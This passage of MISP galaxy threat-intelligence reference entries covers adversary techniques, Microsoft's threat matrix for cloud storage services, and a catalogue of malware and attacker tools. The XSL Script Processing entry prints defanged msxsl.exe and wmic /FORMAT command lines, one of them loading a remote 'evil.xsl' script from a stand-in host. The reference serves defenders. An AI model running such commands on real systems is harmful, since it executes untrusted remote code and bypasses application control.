Encryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.

Adversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://app.tidalcyber.com/technique/f435a5ff-78d2-44de-b464-2b5528f94adc), [Reduce Key Space](https://app.tidalcyber.com/technique/aa6595d5-1b2e-45a8-8caf-b0968aeab2ba), and [Disable Crypto Hardware](https://app.tidalcyber.com/technique/f413afa2-406d-4e8e-a12c-5f1b8ef05d8a), an adversary can negatively affect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. <sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup>

The tag is: misp-galaxy:technique="Weaken Encryption"

Bidirectional Communication

Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to a development project, updating a document hosted on a Web service, or sending a Tweet.

Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

The tag is: misp-galaxy:technique="Bidirectional Communication"

Dead Drop Resolver

Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.

Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).

The tag is: misp-galaxy:technique="Dead Drop Resolver"

One-Way Communication

Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.

Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

The tag is: misp-galaxy:technique="One-Way Communication"

Web Service

Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).

The tag is: misp-galaxy:technique="Web Service"

Windows Management Instrumentation

Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) such as [Distributed Component Object Model](https://app.tidalcyber.com/technique/ebc5fabb-5634-49f2-8979-94ea98da114a) (DCOM) and [Windows Remote Management](https://app.tidalcyber.com/technique/c2866fd3-754e-4b40-897a-e73a8c1fcf7b) (WinRM).<sup>[[MSDN WMI](https://app.tidalcyber.com/references/210ca539-71f6-4494-91ea-402a3e0e2a10)]</sup> Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.<sup>[[MSDN WMI](https://app.tidalcyber.com/references/210ca539-71f6-4494-91ea-402a3e0e2a10)]</sup><sup>[[FireEye WMI 2015](https://app.tidalcyber.com/references/135ccd72-2714-4453-9c8f-f5fde31905ee)]</sup>

An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. <sup>[[FireEye WMI SANS 2015](https://app.tidalcyber.com/references/a9333ef5-5637-4a4c-9aaf-fdc9daf8b860)]</sup> <sup>[[FireEye WMI 2015](https://app.tidalcyber.com/references/135ccd72-2714-4453-9c8f-f5fde31905ee)]</sup>

The tag is: misp-galaxy:technique="Windows Management Instrumentation"

XSL Script Processing

Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. <sup>[[Microsoft XSLT Script Mar 2017](https://app.tidalcyber.com/references/7ff47640-2a98-4a55-939a-ab6c8c8d2d09)]</sup>

Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://app.tidalcyber.com/technique/8811114c-a0cf-479c-b95d-c036467749e3), the Microsoft command line transformation utility binary (msxsl.exe) <sup>[[Microsoft msxsl.exe](https://app.tidalcyber.com/references/a25d664c-d109-466f-9b6a-7e9ea8c57895)]</sup> can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. <sup>[[Penetration Testing Lab MSXSL July 2017](https://app.tidalcyber.com/references/2f1adf20-a4b8-48c1-861f-0a44271765d7)]</sup> Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. <sup>[[Reaqta MSXSL Spearphishing MAR 2018](https://app.tidalcyber.com/references/927737c9-63a3-49a6-85dc-620e055aaf0a)]</sup> Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.<sup>[[XSL Bypass Mar 2019](https://app.tidalcyber.com/references/e4e2cf48-47e0-45d8-afc2-a35635f7e880)]</sup>

Command-line examples:<sup>[[Penetration Testing Lab MSXSL July 2017](https://app.tidalcyber.com/references/2f1adf20-a4b8-48c1-861f-0a44271765d7)]</sup><sup>[[XSL Bypass Mar 2019](https://app.tidalcyber.com/references/e4e2cf48-47e0-45d8-afc2-a35635f7e880)]</sup>

  • <code>msxsl.exe customers[.]xml script[.]xsl</code>

  • <code>msxsl.exe script[.]xsl script[.]xsl</code>

  • <code>msxsl.exe script[.]jpeg script[.]jpeg</code>

Another variation of this technique, dubbed "Squiblytwo", involves using [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a) to invoke JScript or VBScript within an XSL file.<sup>[[LOLBAS Wmic](https://app.tidalcyber.com/references/497e73d4-9f27-4b30-ba09-f152ce866d0f)]</sup> This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://app.tidalcyber.com/technique/b1da2b02-9ade-45e0-a795-ec1b19e5316a)/"Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a) provided they utilize the /FORMAT switch.<sup>[[XSL Bypass Mar 2019](https://app.tidalcyber.com/references/e4e2cf48-47e0-45d8-afc2-a35635f7e880)]</sup>

  • Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>

  • Remote File: <code>wmic os get /FORMAT:"https[:]//example[.]com/evil[.]xsl"</code>

The tag is: misp-galaxy:technique="XSL Script Processing"

Threat Matrix for storage services

The Microsoft Defender for Cloud threat matrix for storage services contains attack tactics, techniques and mitigations relevant to storage services delivered by cloud providers.

Threat Matrix for storage services is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Microsoft - Evgeny Bogokovsky - Ram Pliskin

MS-T801 - Storage account discovery

Attackers may execute active reconnaissance scans to gather storage account names that become potential targets. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.

The tag is: misp-galaxy:tmss="MS-T801 - Storage account discovery"

Table 16241. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/storage-account-discovery

MS-T804 - Search engines

Attackers may use search engines to collect information about victim storage accounts that can be used during targeting. Search engine services typically crawl online sites to index content and may provide users with specialized syntax to search for specific keywords such as storage account domain names (site:*.blob.core.windows.net).

The tag is: misp-galaxy:tmss="MS-T804 - Search engines"

Table 16242. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/search-engines

MS-T803 - Databases of publicly available storage accounts

Attackers may search public databases for publicly available storage accounts that can be used during targeting.

The tag is: misp-galaxy:tmss="MS-T803 - Databases of publicly available storage accounts"

Table 16243. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/databases-of-public-accounts

MS-T826 - DNS/Passive DNS

Attackers may search DNS data for valid storage account names that can become potential targets. Threat actors can query nameservers using brute-force techniques to enumerate existing storage accounts in the wild, or search through centralized repositories of logged DNS query responses (known as passive DNS).

The tag is: misp-galaxy:tmss="MS-T826 - DNS/Passive DNS"

Table 16244. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/dns-passive-dns

MS-T805 - Victim-owned websites

Attackers may look for storage accounts of a victim enterprise by searching its websites. Victim-owned website pages may be stored on a storage account or contain links to retrieve data stored in a storage account. The links contain the URL of the storage and provide an entry point into the account.

The tag is: misp-galaxy:tmss="MS-T805 - Victim-owned websites"

Table 16245. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/victim-owned-websites

MS-T814 - Valid SAS token

A shared access signature (SAS) is a token, appended to the uniform resource identifier (URI) of a storage resource, that grants restricted access rights over the associated resource in your storage account. Attackers may obtain a SAS token using one of the Credential Access techniques or during the reconnaissance process through social engineering.

The tag is: misp-galaxy:tmss="MS-T814 - Valid SAS token"

Table 16246. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/valid-sas-token

MS-T815 - Valid shared key

Attackers may obtain a shared key using one of the Credential Access techniques, or capture one earlier in their reconnaissance process through social engineering, to gain initial access. Adversaries may leverage keys left in source code or configuration files. Sophisticated attackers may also obtain keys from hosts (virtual machines) that have mounted a File Share on their system (SMB). A shared key provides unrestricted permissions over all data plane operations.

The tag is: misp-galaxy:tmss="MS-T815 - Valid shared key"

Table 16247. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/valid-shared-key

MS-T816 - Authorized principal account

Attackers may steal account credentials using one of the credential access techniques or capture an account earlier in their reconnaissance process through social engineering to gain initial access. An authorized principal account can result in full control of storage account resources.

The tag is: misp-galaxy:tmss="MS-T816 - Authorized principal account"

Table 16248. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/authorized-principal-account

MS-T817 - Anonymous public read access

Attackers may leverage publicly exposed storage accounts to list containers/blobs and their properties. Azure Storage supports optional anonymous public read access for containers and blobs. By default, anonymous access to your data is never permitted. Unless you explicitly enable anonymous access, all requests to a container and its blobs must be authorized. When you configure a container’s public access level setting to permit anonymous access, clients can read data in that container without authorizing the request.

The tag is: misp-galaxy:tmss="MS-T817 - Anonymous public read access"

Table 16249. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/anonymous-public-read-access

MS-T825 - SFTP credentials

Attackers may obtain and abuse the credentials of an SFTP account as a means of gaining initial access. SFTP is a prevalent file transfer protocol between a client and a remote service. Once the user connects to the cloud storage service, the user can upload and download blobs and perform other operations that are supported by the protocol. An SFTP connection requires SFTP accounts, which are managed locally in the storage service instance, including credentials in the form of passwords or key pairs.

The tag is: misp-galaxy:tmss="MS-T825 - SFTP credentials"

Table 16250. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/sftp-credentials

MS-T827 - NFS access

Attackers may perform initial access to a storage account using the NFS protocol where it is enabled. While access is restricted to a list of allowed virtual networks configured on the storage account firewall, a connection via the NFS protocol does not require authentication and can be performed by any source on the specified networks.

The tag is: misp-galaxy:tmss="MS-T827 - NFS access"

Table 16251. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/nfs-access

MS-T828 - SMB access

Attackers may perform initial access to a storage account's file shares using the Server Message Block (SMB) protocol.

The tag is: misp-galaxy:tmss="MS-T828 - SMB access"

Table 16252. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/smb-access

MS-T840 - Object replication

Attackers may set a replication policy between source and destination containers that asynchronously copies objects from source to destination. This feature can be maliciously misused in both directions. Outbound replication can serve as an exfiltration channel of customer data from the victim’s container to an adversary’s container. Inbound replication can be used to deliver malware from an adversary’s container to a victim’s container. After the policy is set, the attacker can operate on their container without accessing the victim container.

The tag is: misp-galaxy:tmss="MS-T840 - Object replication"

Table 16253. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/object-replication

MS-T813 - Firewall and virtual networks configuratioin changes

Attackers may disable firewall protection or set additional firewall rules to masquerade their access channel. Azure Storage offers a set of built-in network access features. Administrators can leverage these capabilities to restrict access to storage resources. Restriction rules can operate at the IP level or by VNet ID. When network rules are configured, only requests originating from authorized subnets will be served.

The tag is: misp-galaxy:tmss="MS-T813 - Firewall and virtual networks configuratioin changes"

Table 16254. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/firewall-configuration-changes

MS-T808 - Role-based access control permission

Storage services offer built-in RBAC roles that encompass sets of permissions used to access different data types. Definition of custom roles is also supported. Upon assignment of an RBAC role to an identity object (such as an Azure AD security principal), the storage provider grants access to that security principal. Attackers may leverage the RBAC mechanism to ensure persistent access for identity objects they own.

The tag is: misp-galaxy:tmss="MS-T808 - Role-based access control permission"

Table 16255. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/rbac-permission

MS-T806 - Create SAS token

Attackers may create a high-privileged SAS token with a long expiry to preserve valid credentials for a long period. The tokens are not tracked by storage accounts, thus they cannot be revoked (except Service SAS), and it is not easy to determine whether there are valid tokens in the wild until they are used.

The tag is: misp-galaxy:tmss="MS-T806 - Create SAS token"

Table 16256. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/create-sas-token

MS-T807 - Container access level property

Attackers may adjust the container access level property at the granularity of a blob or container, to permit anonymous read access to data in the storage account. This configuration secures a channel to exfiltrate data even if the initial access technique is no longer valid.

The tag is: misp-galaxy:tmss="MS-T807 - Container access level property"

Table 16257. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/container-access-level-property

MS-T809 - SFTP account

Attackers may create an SFTP account to maintain access to a target storage account. The SFTP account is local on the storage instance and is not subject to Azure RBAC permissions. The account is also unaffected in case of storage account access keys rotation.

The tag is: misp-galaxy:tmss="MS-T809 - SFTP account"

Table 16258. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/sftp-account

MS-T830 - Trusted Azure services

Attackers may configure the storage account firewall to allow access by trusted Azure services. Azure Storage provides a predefined list of trusted services. Any resource from that list that belongs to the same subscription as the storage account is allowed by the firewall even if there is no firewall rule that explicitly permits the source address of the resource.

The tag is: misp-galaxy:tmss="MS-T830 - Trusted Azure services"

Table 16259. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/trusted-azure-services

MS-T829 - Trusted access based on a managed identity

Attackers may configure the storage account firewall to allow access by specific resource instances based on their system-assigned managed identity, regardless of their source address. The resource type can be chosen from a predefined list provided by Azure Storage, and the resource instance must be in the same tenant as the storage account. The RBAC permissions of the resource instance determine the types of operations that a resource instance can perform on storage account data.

The tag is: misp-galaxy:tmss="MS-T829 - Trusted access based on a managed identity"

Table 16260. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/trusted-access-managed-identity

MS-T812 - Private endpoint

Attackers may set private endpoints for a storage account to establish a separate communication channel from a target virtual network. The new endpoint is assigned with a private IP address within the virtual network’s address range. All the requests sent to the private endpoint bypass the storage account firewall by design.

The tag is: misp-galaxy:tmss="MS-T812 - Private endpoint"

Table 16261. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/private-endpoint

MS-T841 - Storage data clone

Storage services offer different types of cloning or backup of the data stored on them. Attackers may abuse these built-in capabilities to steal sensitive documents, source code, credentials, and other business-critical information.

The tag is: misp-galaxy:tmss="MS-T841 - Storage data clone"

Table 16262. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/storage-data-clone

MS-T831 - Data transfer size limits

Attackers may fragment stolen information and exfiltrate it in chunks of different sizes to avoid detection by predefined transfer threshold alerts.

The tag is: misp-galaxy:tmss="MS-T831 - Data transfer size limits"

Table 16263. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/data-transfer-size-limits

MS-T832 - Automated exfiltration

Attackers may exploit legitimate automation processes predefined by the compromised organization, with the goal of having their logging traces blend in with the company's typical activities. Assimilating or disguising malicious intentions keeps adversary actions, such as data theft, stealthier.

The tag is: misp-galaxy:tmss="MS-T832 - Automated exfiltration"

Table 16264. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/automated-exfiltration

MS-T810 - Disable audit logs

Attackers may disable storage account audit logs to prevent event tracking and avoid detection. Audit logs provide a detailed record of operations performed on a target storage account and may be used to detect malicious activities. Thus, disabling these logs can leave a resource vulnerable to attacks without being detected.

The tag is: misp-galaxy:tmss="MS-T810 - Disable audit logs"

Table 16265. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/disable-audit-logs

MS-T811 - Disable cloud workload protection

Attackers may disable the cloud workload protection service which raises security alerts upon detection of malicious activities in cloud storage services.

The tag is: misp-galaxy:tmss="MS-T811 - Disable cloud workload protection"

Table 16266. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/disable-protection-service

MS-T833 - Operations across geo replicas

Attackers may split their requests across geo replicas to reduce the footprint in each region and avoid being detected by various rules and heuristics.

The tag is: misp-galaxy:tmss="MS-T833 - Operations across geo replicas"

Table 16267. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/operations-across-geo-replicas

MS-T818 - Access key query

Attackers may leverage subscription/account-level access to gather storage account keys and use these keys to authenticate at the resource level. This technique exhibits cloud resource pivoting in combination with control management and data planes. Adversaries can query management APIs to fetch primary and secondary storage account keys.

The tag is: misp-galaxy:tmss="MS-T818 - Access key query"

Table 16268. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/access-key-query

MS-T834 - Cloud shell profiles

Cloud Shell is an interactive, authenticated, browser-accessible shell for managing cloud resources. It provides the flexibility of a shell experience, either Bash or PowerShell. To support the Cloud Shell promise of being accessible from everywhere, Cloud Shell profiles and session history are saved on a storage account. Attackers may leverage the legitimate use of Cloud Shell to impersonate account owners and potentially obtain additional secrets logged as part of the session history.

The tag is: misp-galaxy:tmss="MS-T834 - Cloud shell profiles"

Table 16269. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/cloud-shell-profiles

MS-T819 - Unsecured communication channel

Attackers may sniff network traffic and capture credentials sent over an insecure protocol. When a storage account is configured to support an unencrypted protocol such as HTTP, credentials are passed over the wire unprotected and are susceptible to leakage. The attacker can use the compromised credentials to gain initial access to the storage account.

The tag is: misp-galaxy:tmss="MS-T819 - Unsecured communication channel"

Table 16270. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/unsecured-communication-channel

MS-T820 - Storage service discovery

Attackers may leverage access permissions to explore the objects stored in the storage account. Tools seen in the reconnaissance phase are often reused for this post-compromise information-gathering objective, now with authorization to call storage APIs such as List Blobs.

The tag is: misp-galaxy:tmss="MS-T820 - Storage service discovery"

Table 16271. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/storage-service-discovery

MS-T835 - Account configuration discovery

Attackers may leverage control plane access permissions to retrieve the storage account configuration. The configuration contains various technical details that may assist the attacker in implementing a variety of tactics. For example, the firewall configuration provides network access information. Other parameters may reveal whether access operations are logged. The configuration may also contain the backup policy, which may assist the attacker in performing data destruction.

The tag is: misp-galaxy:tmss="MS-T835 - Account configuration discovery"

Table 16272. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/account-configuration-discovery

MS-T821 - Malicious content upload

Attackers may use storage services to store a malicious program or toolset that will be executed later during their operation. In addition, adversaries may exploit the trust between users and their organization's storage services by storing phishing content. Furthermore, storage services can be leveraged to park gathered intelligence that will be exfiltrated when the timing suits the actor group.

The tag is: misp-galaxy:tmss="MS-T821 - Malicious content upload"

Table 16273. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/malicious-content-upload

MS-T822 - Malware distribution

Storage services offer different types of mechanisms to support auto-synchronization between various resources and the storage account. Attackers may leverage access to the storage account to upload malware and benefit from the built-in auto-sync capabilities to have their payload propagated to, and potentially weaponize, multiple systems.

The tag is: misp-galaxy:tmss="MS-T822 - Malware distribution"

Table 16274. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/malware-distribution

MS-T823 - Trigger cross-service interaction

Attackers may manipulate storage services to trigger a compute service, like Azure Functions, where an attacker already has a foothold on a storage container and can inject a blob that will initiate a chain of compute processes. This may allow an attacker to infiltrate another resource and cause harm.

The tag is: misp-galaxy:tmss="MS-T823 - Trigger cross-service interaction"

Table 16275. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/trigger-cross-service-interaction

MS-T824 - Code injection

The same applies to data blobs or files that may eventually be processed on a host by a legitimate application with software vulnerabilities. Attackers may tamper with benign data by adding a payload that exploits a vulnerability on the user's end and executes malicious code.

The tag is: misp-galaxy:tmss="MS-T824 - Code injection"

Table 16276. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/code-injection

MS-T836 - Static website

Attackers may use the "static website" feature to exfiltrate collected data outside of the storage account. Static website is a cloud storage provider hosting capability that enables serving static web content directly from the storage account. The website can be reached via an alternative web endpoint, which might be overlooked when restricting access to the storage account.

The tag is: misp-galaxy:tmss="MS-T836 - Static website"

Table 16277. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/static-website

MS-T839 - Data corruption

Attackers may corrupt or delete data stored on storage services to disrupt the availability of systems or other lines of business.

The tag is: misp-galaxy:tmss="MS-T839 - Data corruption"

Table 16278. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/data-corruption

MS-T838 - Data encryption for impact (Ransomware)

Attackers may encrypt data stored on storage services to disrupt the availability of systems or other lines of business. Resources are made inaccessible by encrypting files or blobs and withholding access to a decryption key. This may be done to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware).

The tag is: misp-galaxy:tmss="MS-T838 - Data encryption for impact (Ransomware)"

Table 16279. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/data-encryption-for-impact

MS-T837 - Data manipulation

Attackers may insert or modify data in order to influence external outcomes, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary.

The tag is: misp-galaxy:tmss="MS-T837 - Data manipulation"

Table 16280. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/data-manipulation

Tool

threat-actor-tools is an enumeration of tools used by adversaries. The list includes malware but also common software regularly used by the adversaries.

Tool is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Alexandre Dulaunoy - Florian Roth - Timo Steffens - Christophe Vandeplas - Dennis Rand - raw-data

Tinba

Banking Malware

The tag is: misp-galaxy:tool="Tinba"

Tinba is also known as:

  • Hunter

  • Zusy

  • TinyBanker

Tinba has relationships with:

  • similar: misp-galaxy:exploit-kit="Hunter" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:banker="Tinba" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Tinba" with estimative-language:likelihood-probability="likely"

Table 16281. Table References

Links

https://thehackernews.com/search/label/Zusy%20Malware

http://blog.trendmicro.com/trendlabs-security-intelligence/the-tinbatinybanker-malware/

PlugX

Malware

The tag is: misp-galaxy:tool="PlugX"

PlugX is also known as:

  • Backdoor.FSZO-5117

  • Trojan.Heur.JP.juW@ayZZvMb

  • Trojan.Inject1.6386

  • Korplug

  • Agent.dhwf

PlugX has relationships with:

  • similar: misp-galaxy:rat="PlugX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="PlugX - S0013" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="PlugX" with estimative-language:likelihood-probability="likely"

Table 16282. Table References

Links

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/112/pulling-the-plug-on-plugx

MSUpdater

Trojan (RAT) linked to current targeted attacks and others dating back to at least early 2009

The tag is: misp-galaxy:tool="MSUpdater"

Table 16283. Table References

Links

https://www.zscaler.com/pdf/whitepapers/msupdater_trojan_whitepaper.pdfx

Lazagne

A password stealing tool regularly used by attackers

The tag is: misp-galaxy:tool="Lazagne"

Lazagne has relationships with:

  • similar: misp-galaxy:malpedia="LaZagne" with estimative-language:likelihood-probability="almost-certain"

Table 16284. Table References

Links

https://github.com/AlessandroZ/LaZagne

Poison Ivy

Poison Ivy is a RAT which was freely available and first released in 2005.

The tag is: misp-galaxy:tool="Poison Ivy"

Poison Ivy is also known as:

  • Backdoor.Win32.PoisonIvy

  • Gen:Trojan.Heur.PT

Poison Ivy has relationships with:

  • used-by: misp-galaxy:threat-actor="APT14" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="PoisonIvy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Poison Ivy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="poisonivy" with estimative-language:likelihood-probability="likely"

Table 16285. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf

https://www.f-secure.com/v-descs/backdoor_w32_poisonivy.shtml

SPIVY

In March 2016, Unit 42 observed this new Poison Ivy variant we’ve named SPIVY being deployed via weaponized documents leveraging CVE-2015-2545.

The tag is: misp-galaxy:tool="SPIVY"

Table 16286. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/

Torn RAT

The tag is: misp-galaxy:tool="Torn RAT"

Torn RAT is also known as:

  • Anchor Panda

Torn RAT has relationships with:

  • used-by: misp-galaxy:threat-actor="APT14" with estimative-language:likelihood-probability="likely"

Table 16287. Table References

Links

https://www.crowdstrike.com/blog/whois-anchor-panda/

OzoneRAT

The tag is: misp-galaxy:tool="OzoneRAT"

OzoneRAT is also known as:

  • Ozone RAT

  • ozonercp

Table 16288. Table References

Links

https://blog.fortinet.com/2016/08/29/german-speakers-targeted-by-spam-leading-to-ozone-rat

ZeGhost

ZeGhost is a RAT which was freely available and first released in 2014.

The tag is: misp-galaxy:tool="ZeGhost"

ZeGhost is also known as:

  • BackDoor-FBZT!52D84425CDF2

  • Trojan.Win32.Staser.ytq

  • Win32/Zegost.BW

Table 16289. Table References

Links

https://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Backdoor%3aWin32%2fZegost.BW

Elise Backdoor

Trojan (RAT) linked to current targeted attacks and others dating back to at least early 2009

The tag is: misp-galaxy:tool="Elise Backdoor"

Elise Backdoor is also known as:

  • Elise

Elise Backdoor has relationships with:

  • similar: misp-galaxy:mitre-malware="Elise - S0081" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Elise" with estimative-language:likelihood-probability="likely"

Table 16290. Table References

Links

http://thehackernews.com/2015/08/elise-malware-hacking.html

Trojan.Laziok

A new information stealer, Trojan.Laziok, acts as a reconnaissance tool allowing attackers to gather information and tailor their attack methods for each compromised computer.

The tag is: misp-galaxy:tool="Trojan.Laziok"

Trojan.Laziok is also known as:

  • Laziok

Trojan.Laziok has relationships with:

  • similar: misp-galaxy:malpedia="Laziok" with estimative-language:likelihood-probability="likely"

Table 16291. Table References

Links

http://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector

Slempo

Android-based malware

The tag is: misp-galaxy:tool="Slempo"

Slempo is also known as:

  • GM-Bot

  • SlemBunk

  • Bankosy

  • Acecard

Slempo has relationships with:

  • similar: misp-galaxy:android="GM Bot" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:android="Bankosy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Slempo" with estimative-language:likelihood-probability="likely"

Table 16292. Table References

Links

https://securityintelligence.com/android-malware-about-to-get-worse-gm-bot-source-code-leaked/

PWOBot

We have discovered a malware family named ‘PWOBot’ that is fairly unique because it is written entirely in Python, and compiled via PyInstaller to generate a Microsoft Windows executable. The malware has been witnessed affecting a number of Europe-based organizations, particularly in Poland. Additionally, the malware is delivered via a popular Polish file-sharing web service.

The tag is: misp-galaxy:tool="PWOBot"

PWOBot is also known as:

  • PWOLauncher

  • PWOHTTPD

  • PWOKeyLogger

  • PWOMiner

